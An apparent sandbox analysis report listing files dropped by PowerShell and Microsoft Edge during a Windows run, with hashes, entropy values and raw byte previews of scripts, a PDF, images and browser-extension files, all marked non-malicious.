                                                                                                                                                                                                                                                                  SHA1:B3FEB76961D6A54EB9566EAC7E688BC55394B672
                                                                                                                                                                                                                                                                  SHA-256:CA2E03394F3B161D3A1E25F6A77B28EFDAB1D7989A0A1C2B6FC1764D8C27B7C7
                                                                                                                                                                                                                                                                  SHA-512:3F775790206CADE3A9CFBDCC3C081611330D525222D43085749A98D975B779109DF305799C53386E4B251D1D892735F5B4B31E6CD95475D0606BDD13BDB24001
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:......Exif..II*.................Ducky.......2......Adobe.d...........................................................#"""#''''''''''..................................................!! !!''''''''''........V.."....................................................................................!1..AQ..aq."2....R..T....Br.#S.U..b..3Cs...t6.c.$D.5uV...4d.E&....%F......................!1..AQaq....."2......BRbr3CS....#..4.............?......1f.n..T......TP....E...........P.....@.........E..@......E.P........@........E.....P.P..A@@.E..@.P.P..AP.P..AP..@....T..AP.E..P.Z .. ....."... .....7.H...w.....t.....T....M.."... P..n.n..t5..*B.P..*(.................*.....................( ..................*.. .".... .".......(.. .".....*.. ....o......E.6... ..*..."........."J......Ah......@.@@....:@{6..wCp..3...((.(......................*...@..(...."....................*......*.. ........T.......@.@@........AP.P..@.E@....E@.d.E@.@@..@.P.T..@..@..P.D...@M........EO..."...=.wCp.....R......P.@......

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5ua4ubhl.h5c.ps1

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_aiiy5ukj.ztu.ps1

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cgruju4p.wvs.psm1

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fq4nzj3k.0b5.psm1

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gv2hhqme.yks.ps1

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_x5lssqiu.v5d.psm1

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\aff7310e-e430-4b16-86a8-ee19b2c5c7f2.pdf

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                  File Type:PDF document, version 1.7
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):656088
                                                                                                                                                                                                                                                                  Entropy (8bit):7.994208869820549
                                                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                                                  SSDEEP:12288:r/TWRciaGbqp+t4v1TxPDt75QhxfR4/xFSnhfCsP10+:jTgc3Iq+0hxLt75Q6ZFShf/Pm+
                                                                                                                                                                                                                                                                  MD5:19E87DB70542A9FA556C1412E35FC300
                                                                                                                                                                                                                                                                  SHA1:B74FE6AB84969B938BF76E2A780546CFC727EAFB
                                                                                                                                                                                                                                                                  SHA-256:CF41E7881EC4A232F462EF0FC0E15C409619D18B3A8A84B49768268505AF80E3
                                                                                                                                                                                                                                                                  SHA-512:3983D20EF020BCAED0A3269CAE844B35BFCC99558820697517D4C9BDBD886D425A3236D08DB9194E816F0AACE2E6DDEFF0F95A693B4ED7FC3B91EBA018CEF440
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:%PDF-1.7.%.....18 0 obj.<<./Length 293./N 3./Filter /FlateDecode.>>.stream.x.}..J......(.....28.h..iRpi"..V..S..A.OHS..tspu+....c(....#....AR.x.......@.....?..F..[V[..G@`*...dK..$...O.K..o...@...6..`.O.,f'..O. .a.sx.0A..6..vf...8....{c7..%op..Z.:u.....Q.......0Q.F.....*....(.S....DGACAa..j.g.rx....]..s...PxM.......c...vhO.<..v....-X}...b3~...*....mDJH.T~...K..endstream.endobj.19 0 obj.<<./Type /XObject./Subtype /Image./Width 2400./Height 1363./ColorSpace /DeviceRGB./BitsPerComponent 8./ColorTransform 0./Filter [/FlateDecode /DCTDecode]./DecodeParms [null <<./Quality 45.>>]./Length 11488.>>.stream.x..}}p..y.}. ....:..4nA'`........I..e.....T].).E.!....&u..9.&k.0-.]A.......m...V.Lf.FP..!.4M..Q.......M......gw...=H....x.....o...........x&qj......F.3.}...O......}.?.......}.....~lq.-,}.g?....K......>......\_.....I..f.x.........G.....w....\:~9.|.".h2.h..7..5.Hf.._B.K.....G...:A>..D*.N......y........Sg.g....=..+..~.+.~...............N.wtl|..O..O......CO........B.r...|..

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\cca85778-f40f-4584-b3bb-6b946323a80d.tmp

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:very short file (no magic)
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):1
                                                                                                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3:L:L
                                                                                                                                                                                                                                                                  MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                  SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                  SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                  SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:.

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\cfd33c57-dd19-4f13-bd12-18e70d8d5336.tmp

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 41900
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):76321
                                                                                                                                                                                                                                                                  Entropy (8bit):7.996057445951542
                                                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                                                  SSDEEP:1536:hS5Vvm808scZeEzFrSpzBUl4MZIGM/iys3BBrYunau6wpGzxue:GdS8scZNzFrMa4M+lK5/nXexue
                                                                                                                                                                                                                                                                  MD5:D7A1AC56ED4F4D17DD0524C88892C56D
                                                                                                                                                                                                                                                                  SHA1:4153CA1A9A4FD0F781ECD5BA9D2A1E68C760ECD4
                                                                                                                                                                                                                                                                  SHA-256:0A29576C4002D863B0C5AE7A0B36C0BBEB0FB9AFD16B008451D4142C07E1FF2B
                                                                                                                                                                                                                                                                  SHA-512:31503F2F6831070E887EA104296E17EE755BB6BBFB1EF2A15371534BFA2D3F0CD53862389625CF498754B071885A53E1A7F82A3546275DB1F4588E0E80BF7BEE
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:...........m{..(.}...7.\...N.D*.w..m..q....%XfL.*I.ql..;/.....s...E...0....`..A..[o^.^Y...F_.'.*.."L...^.......Y..W..l...E0..YY...:.&.u?....J..U<.q."...p.ib:.g.*.^.q.mr.....^&.{.E.....,EAp.q.......=.=.....z^.,d.^..J.R..zI4..2b?.-D5/.^...+.G..Y..?5..k........i.,.T#........_DV....P..d2......b\..L....o....Z.}../....CU.$.-..D9`..~......=....._.2O..?....b.{...7IY.L..q....K....T..5m.d.s.4.^... ..~<..7~6OS..b...^>.......s..n....k."..G.....L...z.U...... ... .ZY...,...kU1..N...(..V.r\$..s...X.It...x.mr..W....g........9DQR....*d......;L.S.....G... .._D.{.=.zI.g.Y~...`T..p.yO..4......8$..v.J..I.%..._.d.[..du5._._...?\..8.c.....U...fy.t....q.t....T@.......:zu..\,.!.I..AN_.....FeX..h.c.i.W.......(.....Y..F...R%.\..@.. 2(e,&.76..F+...l.t.$..`...........Wi.{.U.&(.b}...}.i..,...k....!..%...&.c..D-."..SQ.......q9....)j....7.".N....AX...).d./giR....uk.....s.....^...........:...~......(hP..K.@.&..?.E0:+D|9...U.q.cu..)t{.e...X...{.....z......LL&I6.=.

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\cv_debug.log

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):2110
                                                                                                                                                                                                                                                                  Entropy (8bit):5.399966480876905
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:48:Yzj57SnaJ57H57Uv5W1Sj5W175zuR5z+5zn071eDJk5c1903bj5jJp0gcU854Rrl:8e2Fa116uCntc5toY47FzM
                                                                                                                                                                                                                                                                  MD5:15BC5D38623D5B23E0F1005EE07E3ADE
                                                                                                                                                                                                                                                                  SHA1:1DEE7087CF11FF011CFD55A4ED6AEEB93C4F8588
                                                                                                                                                                                                                                                                  SHA-256:DBC48E7ABFB746EE7F95442A065E152B9CA0F43539814652178EE68D18B3A883
                                                                                                                                                                                                                                                                  SHA-512:532AC3E29E71852DAD219BF0208B7E370377DA4C44788EB30E609A37002A56F1CD5EE70B0428E80F56EBDF569E0336FF16D0E6B13B0042EC76329987EC4219A6
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{"logTime": "1004/133448", "correlationVector":"vYS73lRT+EoO2Owh9jsc+Y","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/133448", "correlationVector":"n/KhuHPhHmYXokB31+JZz7","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/133448", "correlationVector":"fclQx26bUZO07waFEDe6Fn","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/133448", "correlationVector":"0757l0tkKt37vNrdCKAm8w","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/133449", "correlationVector":"uTRRkmbbqkgK/wPBCS4fct","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/133449", "correlationVector":"2DrXipL1ngF91RN7IemK0e","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/134324", "correlationVector":"d0GyjEgnW85fvDIojHVIXI","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/134324", "correlationVector":"PvfzGWRutB/kmuXUK+c8XA","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/134324", "correlationVector":"29CB75FBC4C942E0817A1F7A0E2CF647

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\e05508cd-a52f-42c0-81e8-54f94c423fcc.tmp

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:PNG image data, 340 x 191, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):704145
                                                                                                                                                                                                                                                                  Entropy (8bit):7.998010742509996
                                                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                                                  SSDEEP:12288:LMlUHH5Fs2XqU+zth/17kc2KfTFTi9JPNfgBTIxXL2v6YRl5JCqqpRFW0X2yk:LM0H5u3zn/17kSps1IBTI9LkhSqqQ0Xq
                                                                                                                                                                                                                                                                  MD5:4CF32808B1F479BF6D69CA6035E343BC
                                                                                                                                                                                                                                                                  SHA1:38F733AE71B51E690EC6CCD791469F101A3B19A5
                                                                                                                                                                                                                                                                  SHA-256:9C52BD9A8A1E71B5C358425493F9AFA34A77A12195FA2007268BA1FAC71E53F7
                                                                                                                                                                                                                                                                  SHA-512:A185B918940ABE8CF692CFE7704148BE2A8F1F29E7C4FD6A3FC4F52ED718672C7773F8BD10412D4D227B1769D3790D2609E73E9A3A6C1864EB6FB7A4B9A86E8E
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:.PNG........IHDR...T..........f$@....sRGB....... .IDATx^...$Wu..W.6.... .V.U.( $...6.0..M2.68?.9<..q.ll.l.H.d.@...$....]m.......S...Su......{zvwV].V3.}.s...I.\-......0.......3.[.*X..3..Z.[.7.B.!.T.,....|.z.sL..: ..5#T.F.).u._.Vq...O..2.>4c;..iT._9a...6t..4Wj..n....=...J|Q...CQs......,.(~-}..D.~<.]......r^s.N..}...*.K.Z......../..._.q.{=....k.#7.............T..U.w....v/....*?.P...._.D..e!..&..k..J....Z|w......o......+s......d.xU+m.,c~...;.....7.`.X@..LW_l.b... (.b).E.]...T.J..o.....].x.Z&....&...e.I/ ....Bv.U$+..oT.|.qIP@.....J..V]....m.j...7.....T....~.Z.8.y*...X..Z..@3f.....L.."..(Jz:....P..@..J.{s.TE.Be.QkRI..Z..v..Yj..|......OK.-..........z..,^M~,Q.[..^...r.M..L....R......Y.ADbE.b36..GBU.Vc.j*.9.j..V.......>.3...tR....U {.$..H...W...<l. .M...3.X@.'.?t.O..7.c...).....9....,.Tm3.Y...%hz._T.............u.........X.s....L+.j.t\.U.f+....@M.BA.16....n.a5@-n../.... .L-L.`5..U!........&.....{.:.....4.^tQ[.7..~X...w..h.sp..bf.E..E.w.....[.GE....

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7260_100639036\1846d1e0-9dcc-4892-a53a-49a53350f877.tmp

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):11185
                                                                                                                                                                                                                                                                  Entropy (8bit):7.951995436832936
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:192:YEKh1jNlwQbamjq6Bcykrs3kAVg55GzVQM5F+XwsxNv7/lsoltBq0WG4ZeJTmrRb:fKT/BAzA05Gn5F+XV7NNltrWG4kJTm1b
                                                                                                                                                                                                                                                                  MD5:78E47DDA17341BED7BE45DCCFD89AC87
                                                                                                                                                                                                                                                                  SHA1:1AFDE30E46997452D11E4A2ADBBF35CCE7A1404F
                                                                                                                                                                                                                                                                  SHA-256:67D161098BE68CD24FEBC0C7B48F515F199DDA72F20AE3BBB97FCF2542BB0550
                                                                                                                                                                                                                                                                  SHA-512:9574A66D3756540479DC955C4057144283E09CAE11CE11EBCE801053BB48E536E67DC823B91895A9E3EE8D3CB27C065D5E9030C39A26CBF3F201348385B418A5
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:Cr24..............0.."0...*.H.............0.........N.......E#......9e.u.q...VYY..@.+.C..k.O..bK.`..6.G..%.....3Z...e _.6....F..1p..K.Z......./ .3...OT..`..0...Y...FT..43.th.y...}....p.L...2S.&i.`..o...f.oH.....N..:..ijT.3.F{.0.,.f?'f.CQt;b_"Pc.. ..~S.I.c.8Z.;.....{G.a......k...>.`.o..%.$>;.....g.............jg?.R..@.:..........&..{...x@.Py..;kT....%F".S..w...N....9...A..@X.t!i.@..1;......1E..X.....[.~$....J......;=T.;)k..Y...$......S......M.P..P..>..=..u.....2p...w.9..1qw.a\A..Vj .C.....A..Cf1.r6.A...L. _m...[..l.Wr_../.. .B..9!.!+..ZG.K.......0.."0...*.H.............0.........^SUd%Q.L].......Cl2o...\[.....'*...;R=....N.C5....d. .....J.C>u.kr..Y..syJC.XS.q..E.n?....(G.5..)2.G..!.M.SS.{..U....!.EE..M[.#qs.A.1...g)nQ.c..G....Bd..7... .O.BI..KXQ..4.d.K.0......g.....-p....Z.E{...M&.~n.TE7..{0....5.#.C+3.y)pd9.e.........@..3.9..B.....I....2nX........2.?.~..S....]G.N.....Lr.O.Ve....9..D1.G..W)...P.?=.#..7.R.lz..a.wX.e..h.h.~....v..RP.@X....d.G

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7260_100639036\CRX_INSTALL\_metadata\verified_contents.json

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):1753
                                                                                                                                                                                                                                                                  Entropy (8bit):5.8889033066924155
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:48:Pxpr7Xka2NXDpfsBJODI19Kg1JqcJW9O//JE3ZBDcpu/x:L3XgNSz9/4kIO3u3Xgpq
                                                                                                                                                                                                                                                                  MD5:738E757B92939B24CDBBD0EFC2601315
                                                                                                                                                                                                                                                                  SHA1:77058CBAFA625AAFBEA867052136C11AD3332143
                                                                                                                                                                                                                                                                  SHA-256:D23B2BA94BA22BBB681E6362AE5870ACD8A3280FA9E7241B86A9E12982968947
                                                                                                                                                                                                                                                                  SHA-512:DCA3E12DD5A9F1802DB6D11B009FCE2B787E79B9F730094367C9F26D1D87AF1EA072FF5B10888648FB1231DD83475CF45594BB0C9915B655EE363A3127A5FFC2
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:[.. {.. "description": "treehash per file",.. "signed_content": {.. "payload": "eyJpdGVtX2lkIjoiam1qZmxnanBjcGVwZWFmbW1nZHBma29na2doY3BpaGEiLCJpdGVtX3ZlcnNpb24iOiIxLjIuMSIsInByb3RvY29sX3ZlcnNpb24iOjEsImNvbnRlbnRfaGFzaGVzIjpbeyJmb3JtYXQiOiJ0cmVlaGFzaCIsImRpZ2VzdCI6InNoYTI1NiIsImJsb2NrX3NpemUiOjQwOTYsImhhc2hfYmxvY2tfc2l6ZSI6NDA5NiwiZmlsZXMiOlt7InBhdGgiOiJjb250ZW50LmpzIiwicm9vdF9oYXNoIjoiQS13R1JtV0VpM1lybmxQNktneUdrVWJ5Q0FoTG9JZnRRZGtHUnBEcnp1QSJ9LHsicGF0aCI6ImNvbnRlbnRfbmV3LmpzIiwicm9vdF9oYXNoIjoiVU00WVRBMHc5NFlqSHVzVVJaVTFlU2FBSjFXVENKcHhHQUtXMGxhcDIzUSJ9LHsicGF0aCI6Im1hbmlmZXN0Lmpzb24iLCJyb290X2hhc2giOiJKNXYwVTkwRmN0ejBveWJMZmZuNm5TbHFLU0h2bHF2YkdWYW9FeWFOZU1zIn1dfV19",.. "signatures": [.. {.. "header": {.. "kid": "publisher".. },.. "protected": "eyJhbGciOiJSUzI1NiJ9",.. "signature": "UglEEilkOml5P1W0X6wc-_dB87PQB73uMir11923av57zPKujb4IUe_lbGpn7cRZsy6x-8i9eEKxAW7L2TSmYqrcp4XtiON6ppcf27FWACXOUJDax9wlMr-EOtyZhykCnB9vR

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7260_100639036\CRX_INSTALL\content.js

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:Unicode text, UTF-8 text, with very long lines (8031), with no line terminators
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):9815
                                                                                                                                                                                                                                                                  Entropy (8bit):6.1716321262973315
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:192:+ThBV4L3npstQp6VRtROQGZ0UyVg4jq4HWeGBnUi65Ep4HdlyKyjFN3zEScQZBMX:+ThBVq3npozftROQIyVfjRZGB365Ey97
                                                                                                                                                                                                                                                                  MD5:3D20584F7F6C8EAC79E17CCA4207FB79
                                                                                                                                                                                                                                                                  SHA1:3C16DCC27AE52431C8CDD92FBAAB0341524D3092
                                                                                                                                                                                                                                                                  SHA-256:0D40A5153CB66B5BDE64906CA3AE750494098F68AD0B4D091256939EEA243643
                                                                                                                                                                                                                                                                  SHA-512:315D1B4CC2E70C72D7EB7D51E0F304F6E64AC13AE301FD2E46D585243A6C936B2AD35A0964745D291AE9B317C316A29760B9B9782C88CC6A68599DB531F87D59
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:(()=>{"use strict";var e={1:(e,o)=>{Object.defineProperty(o,"__esModule",{value:!0}),o.newCwsPromotionalButtonCta=o.chromeToEdgeCwsButtonCtaMapping=void 0,o.chromeToEdgeCwsButtonCtaMapping={"...... ... Chrome":"...... ....","........ .. Chrome":".....",........:"..........",".......... .. Chrome":"..........","Chrome . .....":"...","Chrome .... ....":"....","Afegeix a Chrome":"Obt.n","Suprimeix de Chrome":"Suprimeix","P.idat do Chromu":"Z.skat","Odstranit z Chromu":"Odebrat","F.j til Chrome":"F.","Fjern fra Chrome":"Fjerne",Hinzuf.gen:"Abrufen","Aus Chrome entfernen":"Entfernen","Add to Chrome":"Get","Remove from Chrome":"Remove","A.adir a Chrome":"Obtener",Desinstalar:"Quitar","Agregar a Chrome":"Obtener","Eliminar de Chrome":"Quitar","Lisa Chrome'i":"Hangi","Chrome'ist eemaldamine":"Eemalda",.......H:"........","......... ... .. Chr

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7260_100639036\CRX_INSTALL\content_new.js

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:Unicode text, UTF-8 text, with very long lines (8604), with no line terminators
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):10388
                                                                                                                                                                                                                                                                  Entropy (8bit):6.174387413738973
                                                                                                                                                                                                                                                                  Encrypted:false
